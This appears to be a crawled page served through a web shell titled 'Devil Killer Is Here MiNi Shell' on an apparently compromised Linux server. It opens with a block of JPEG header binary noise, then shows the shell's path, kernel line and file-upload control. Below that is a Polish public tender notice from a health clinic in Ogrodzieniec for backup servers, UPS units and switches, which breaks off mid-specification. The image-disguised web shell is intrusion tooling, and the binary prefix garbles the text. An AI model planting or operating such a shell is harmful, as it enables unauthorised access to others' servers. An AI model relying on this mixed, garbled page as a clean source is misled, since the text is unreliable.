JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250428/0020937701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa serwera backupowego wraz z oprogr. oraz serwera<br/>do arch. bazy danych (...) dwóch UPS-ów oraz dwóch switch-ów w ramach projektu pod nazwą Wsparcie podstawowej opieki zdrowotnej (POZ). </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej w Ogrodzieńcu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276985281</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Plac Wolności 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ogrodzieniec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-440</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kadry@spzoz.ogrodzieniec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.spzoz.ogrodzieniec.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Samodzielny Publiczny Zakład Opieki Zdrowotnej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa serwera backupowego wraz z oprogr. oraz serwera<br/>do arch. bazy danych (...) dwóch UPS-ów oraz dwóch switch-ów w ramach projektu pod nazwą Wsparcie podstawowej opieki zdrowotnej (POZ). </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-352c811e-def1-4a6a-9eae-6ffc0461189b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00209377</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie realizowane w ramach Projektu grantowego nr FENX.06.01-IP.03-0001/23 pod nazwą „Wsparcie podstawowej opieki zdrowotnej (POZ)”, realizowanego w ramach programu Fundusze Europejskie na Infrastrukturę, Klimat, Środowisko 2021-2027, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-352c811e-def1-4a6a-9eae-6ffc0461189b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie<br/>przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną<br/>(Dz. U. z 2024 r. poz. 1513), tj.: przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>tj.: za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji).<br/>2. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>kadry@spzoz.ogrodzieniec.pl (nie dotyczy składania ofert) oraz adresy e-mail Wykonawców podane w formularzach ofertowych.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która<br/>jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2. Komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji<br/>elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2024 r. poz. 1513), tj.:<br/>przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. tj.:za pośrednictwem formularzy<br/>do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji).<br/>3. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komu. za pomocą poczty elektronicznej na adres e-mail:<br/>kadry@spzoz.ogrodzieniec.pl<br/>(nie dotyczy składania ofert) oraz adresy e-mail Wykonawców podane w form.ofertowych.<br/>4. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odp.. Formularze do komunikacji<br/>umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>5. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dot. treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na<br/>Platformie e-Zamówienia.<br/>6. Wszystkie wysłane i odebrane w post. przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w<br/>zakładce „Komunikacja”.<br/>7. Maks. rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików<br/>przesyłanych jako zał. do jednego formularza).<br/>8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia okr .Regulamin</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>	administratorem Pani/Pana danych osobowych jest: Dyrektor Samodzielnego Zakładu Opieki Zdrowotnej w Ogrodzieńcu;<br/>	administrator wyznaczył Inspektora Ochrony Danych – Pana Michała Malickiego, z którym może się Pani/Pan skontaktować w sprawach związanych z ochroną danych osobowych w następujący sposób: e-mail: anmal.malicki@gmail.com ;<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego: <br/>Dostawa serwera backupowego wraz z oprogramowaniem serwerowym i backupowym, serwera <br/>do archiwizacji bazy danych oprogramowania do obsługi poradni, archiwizacji dokumentacji medycznej, skanów dokumentów dołączanych do dokumentacji, dwóch zasilaczy awaryjnych UPS oraz dwóch switch-ów realizowane w ramach projektu pod nazwą „Wsparcie podstawowej opieki zdrowotnej (POZ)”.odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t.j. Dz.U. z 2024 r. poz. 1320) dalej „ustawa Pzp”;<br/>	Pani/Pana dane osobowe będą przechowywane przez okres, który wyznaczony zostanie przede wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie działania archiwów zakładowych, chyba że przepisy szczególne stanowią inaczej;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>•	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych(1);<br/>•	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych (2);<br/>•	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/><br/><br/>(1) wyjaśnienie: skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowaniao udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/><br/>(2) wyjaśnienie: zgodnie z art. 19 ust. 3 ustawy Pzp wystąpienie z zadaniem o którym mowa w art. 18 ust.1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postepowania o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/3/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: Dostawa serwera backupowego wraz z oprogramowaniem serwerowym i backupowym, serwera do archiwizacji bazy danych oprogramowania do obsługi poradni, archiwizacji dokumentacji medycznej, skanów dokumentów dołączanych do dokumentacji, dwóch zasilaczy awaryjnych UPS oraz switch-ów realizowane w ramach projektu pod nazwą: „Wsparcie podstawowej opieki zdrowotnej (POZ)”.<br/>3.	Szczegółowy opis przedmiotu zamówienia (OPZ) stanowi Załącznik nr 4 do SWZ.<br/>4.	Ponadto, obowiązki Wykonawcy związane z realizacją zamówienia określają także załączone do SWZ projektowane postanowienia umowy – PPU.<br/>5.	Zamówienie realizowane w ramach Projektu grantowego nr FENX.06.01-IP.03-0001/23 pod nazwą „Wsparcie podstawowej opieki zdrowotnej (POZ)”, realizowanego w ramach programu Fundusze Europejskie na Infrastrukturę, Klimat, Środowisko 2021-2027, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego.<br/>6.	Przedmiot zamówienia będzie dostępny dla osób niepełnosprawnych.<br/>Możliwość obsługi systemu przez osoby niepełnosprawne.<br/>OPZ:<br/>1.	Serwer backupowy wraz z oprogramowaniem serwerowym i backupowym – 1 szt., Serwer do bazy danych oprogramowania do obsługi poradni, archiwizacji dokumentacji medycznej, skanów dokumentów dołączanych do dokumentacji – 1 szt:<br/><br/>w konfiguracji nie gorszej niż:<br/><br/><br/>Lp.	<br/>Charakterystyka / wymagania minimalne<br/><br/>1. Typ	Serwer typu RACK<br/>2. Procesor	Procesor min. 8 rdzeniowy, osiągający w teście SPECrate®2017_int_base wynik co najmniej 50 punktów w teście dostępnym na stronie internetowej www.spec.org z dnia 28.04.2025 r. (wyniki załączone do dokumentów postępowania).<br/>3. Płyta główna:	Płyta główna dedykowana do pracy w serwerach, umożliwiająca instalację zaoferowanego procesora.<br/>4. Pamięć operacyjna RAM:	Pamięć operacyjna RAM - min. 64 GB pamięci z możliwością rozbudowy do min. 128GB pamięci.<br/>Min. 4 banki pamięci<br/>5. Parametry pamięci masowej	Zainstalowane dwa dyski min. 960GB skonfigurowane w RAID 1 w przypadku serwera do baz danych. <br/>Zainstalowane dwa dyski min. 8 TB skonfigurowane w RAID 1 w przypadku serwera backupowego. <br/>Dyski z przeznaczeniem serwerowym (klasa enterprise).<br/>6. Karta graficzna	Zintegrowana z płytą główną, posiadająca minimum 16MB pamięci<br/>7. Porty / złącza zewnętrzne	Min.:1 x USB 2.0 (1 z przodu), 1 x iDRAC Direct (Micro-AB USB) port<br/>1 x USB 2.0, 1 x USB 3.2, 1 x VGA, , 1 x LAN (Gigabit Ethernet) - RJ-45, 1 x Dedicated iDRAC Ethernet port<br/>8. Sloty rozszerzeń	Możliwość instalacji do 2 kart PCI-Express generacji co najmniej 4:<br/>Slot 1: 1 x8 with x8 bandwidth, Half Length, Low Profile<br/>Slot 2: 1 x16 with x8 bandwidth, Half Length, Low Profile<br/>9. Obudowa	Do instalacji w szafie rack 19&#34;, wysokość nie więcej niż 1U, z zestawem szyn do mocowania w szafie i wysuwania. Głębokość/długość serwera nie większa niż 610 mm.<br/>10. Zasilacz	Zasilacz o mocy minimum 450W i posiadający certyfikat co najmniej platinium lub <br/>równoważny<br/>11. Zgodność <br/>z systemami operacyjnymi	Microsoft Windows Server Essentials 2025; Red Hat Enterprise Linux 8,9 (x64); SUSE Linux Enterprise Server 15 ; VMware vSphere (ESXi) 7.0 I 8.0.<br/>12. Bezpieczeństwo	Moduł TPM 2.0 trwale zintegrowany / wbudowany w płytę główną. <br/>13. Diagnostyka	Serwer powinien posiadać możliwość instalacji panelu diagnostycznego wyświetlającego informacje o awarii co najmniej dla następujących komponentów: pamięci, dyski, kontrolery RAID.<br/>14. Certyfikaty	Certyfikaty, oświadczenia i standardy - Deklaracja zgodności CE <br/>Certyfikat ISO 9001 dla producenta serwera lub równoważny<br/>Certyfikat ISO 14001 dla producenta serwera lub równoważny<br/>Certyfikat ISO 50001 dla producenta serwera lub równoważny<br/>15. System operacyjny<br/><br/><br/>	Microsoft Windows Server Standard lub równoważny w przypadku serwera baz danych.<br/>System należy dostarczyć wraz z licencjami CAL na 25 użytkowników.<br/>Za równoważny Zamawiający przyjmuje:<br/>Równoważne rozwiązanie musi spełniać następujące wymagania poprzez wbudowane mechanizmy, bez użycia dodatkowych aplikacji:<br/>1.	System operacyjny musi być przeznaczony do zastosowań serwerowych w Środowiskach fizycznych lub o minimalnej wirtualizacji. <br/>2.	System operacyjny musi być najnowszą wersją rodziny systemów operacyjnych danego producenta. <br/>3.	Licencja na system operacyjny musi uwzględniać prawo do bezpłatnej instalacji udostępnianych przez producenta poprawek krytycznych i opcjonalnych do zakupionej wersji oprogramowania co najmniej przez 5 lat. <br/>4.	Licencja na system operacyjny musi umożliwiać uruchomienie kontrolera domeny Active Directory na poziomie Microsoft Windows Server <br/>5.	Licencja na system operacyjny musi być bez ograniczeń czasowych. <br/>6.	Licencja na system operacyjny musi pokrywać wszystkie fizyczne rdzenie na serwerze. <br/>7.	Licencja na system operacyjny musi uprawniać do uruchamiania systemu operacyjnego w środowisku fizycznym i min. 1 środowisko wirtualne za pomocą wbudowanych mechanizmów wirtualizacji, bez konieczności zakupu dodatkowych licencji. <br/>8.	Zaimplementowanie w systemie operacyjnym środowiska wirtualizacyjnego musi umożliwiać dodawanie i usuwanie pamięci wirtualnej oraz wirtualnych kart sieciowych podczas pracy maszyny wirtualnej. <br/>9.	System operacyjny musi posiadać graficzny interfejs użytkownika. <br/>10. System operacyjny musi być w pełni kompatybilny z usługą Active Directory w zakresie: <br/>a.	zarządzania użytkownikami, <br/>b.	zarządzania certyfikatami dla użytkowników wraz ze wsparciem możliwości logowania do domeny kartą mikroprocesorową, <br/>c.	możliwości przydzielania praw dostępu do zasobów sieciowych, <br/>d.	instalacji zdalnej oprogramowania z pakietów msi, <br/>e.	definiowanie polityk bezpieczeństwa dla użytkowników, grup oraz stacji roboczych z systemami MS Windows: 7,8,8.1, 10,11. <br/>11. System operacyjny musi wspierać pracę domenową wraz z automatyczną synchronizacją dla dodatkowych serwerów. <br/>12. System operacyjny musi wspierać zarządzanie przez dostępne narzędzia administracji serwera dla systemu Windows 10 (RSAT) oraz Windows Admin Center <br/>13. System operacyjny musi posiadać obsługę zdalnego pulpitu poprzez protokół RDP. <br/>14. System operacyjny musi umożliwiać ustawianie relacji zaufania pomiędzy domenami. <br/>15. Wszystkie narzędzia i usługi systemu operacyjnego powinny być rozwiązaniem jednego producenta. <br/>16. System operacyjny musi posiadać obsługę pamięci USB jako monitora klastra. System operacyjny musi pozwalać na stopniowe uaktualnienia systemu operacyjnego klastra <br/>17. System operacyjny musi posiadać obsługę deduplikacji na potrzeby systemu plików ReFS. <br/>18. System operacyjny musi posiadać obsługę optymalizacji transportu w tle pod kątem opóźnień. <br/>19. System operacyjny musi posiadać wbudowaną zaporę internetową (firewall) dla ochrony połączeń internetowych; zapora musi być zintegrowana z systemem konsoli do zarządzania ustawieniami zapory i regułami ip v4 i v6; <br/>20. System operacyjny musi posiadać możliwość uruchomienia serwera DNS z możliwością integracji z kontrolerem domeny; <br/>21. System operacyjny musi posiadać możliwość zdalnej automatycznej instalacji, konfiguracji, administrowania oraz aktualizowania systemu; <br/>22. System operacyjny musi posiadać obsługa PowerShelI 5.1, <br/>23. System operacyjny musi posiadać obsługę certyfikatów w Active Directory <br/>24. Wszystkie wymienione powyżej parametry, role, funkcje, itp. systemu operacyjnego objęte muszą być dostarczoną licencją (licencjami) i zawarte w dostarczonej wersji oprogramowania (nie wymagają ponoszenia przez Zamawiającego dodatkowych kosztów).<br/><br/> System Microsoft Windows Server Essentials 2025 lub równoważny dla serwera backupowego.<br/>Za równoważny Zamawiający przyjmuje:<br/>Licencja bez ograniczeń́ czasowych. Warunki licencjonowania muszą zezwalać́ na zmianę̨ wersji systemu operacyjnego na niższą z zachowaniem wsparcia technicznego oraz na przeniesienie licencji systemu operacyjnego na inny fizyczny serwer. Instalacja i użytkowanie aplikacji 32- i 64- bitowych na dostarczonym serwerowym systemie operacyjnym w ramach dostarczonej licencji zawarta możliwość instalacji oprogramowania na serwerze wieloprocesorowym - obsługa 2 procesorów fizycznych i co najmniej 2 procesorów logicznych (wirtualnych). Wielkość obsługiwanej pamięci RAM w ramach jednej instancji systemu operacyjnego – przynajmniej 128GB. Obsługa dostępu wielościeżkowego do zasobów LAN poprzez karty Gigabit Ethernet i szybsze, w trybie równoważenia obciążenia łącza (load balancing) i redundancji łącza (failover) – natywnie lub z wykorzystaniem sterowników producenta sprzętu. <br/>Praca w roli klienta domeny Microsoft Active Directory. Zawarta możliwość uruchomienia roli kontrolera domeny Microsoft Active Directory na poziomie Microsoft Windows Server 2022. Zawarta możliwość uruchomienia roli serwera DHCP, w tym funkcji klastrowania serwera DHCP (możliwość uruchomienia dwóch serwerów DHCP operujących jednocześnie na tej samej puli oferowanych adresów IP).<br/>Zawarta możliwość uruchomienia roli serwera DNA<br/>Zawarta możliwość uruchomienia roli klienta i serwera czasu (NTP)<br/>Zawarta możliwość uruchomienia roli serwera plików z uwierzytelnieniem i autoryzacją dostępu w domenie Microsoft Active Directory<br/>Zawarta możliwość uruchomienia roli serwera wydruku z uwierzytelnieniem i autoryzacją dostępu w domenie Microsoft Active Directory<br/>Zawarta możliwość uruchomienia roli serwera stron WWW<br/>Dostępny hypervisor umożliwiający uruchamianie wirtualnych systemów w ramach zasobów sprzętowych serwera<br/>W ramach licencji zawarte prawo do wirtualizacji minimum jednego serwera na zasobach sprzętowych serwera - w ramach licencji zawarte prawo do pobierania poprawek systemu operacyjnego. <br/>Wszystkie wymienione powyżej parametry, role, funkcje, itp. systemu operacyjnego objęte są dostarczoną licencją (licencjami) i zawarte w dostarczonej wersji oprogramowania (nie wymagają ponoszenia przez Zamawiającego dodatkowych kosztów).<br/>System posiadający zintegrowane licencje dostępowe dla użytkownika lub urządzenia w ilości min. 25 licencji.<br/>(...) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31682520-1 - Awaryjne urządzenia 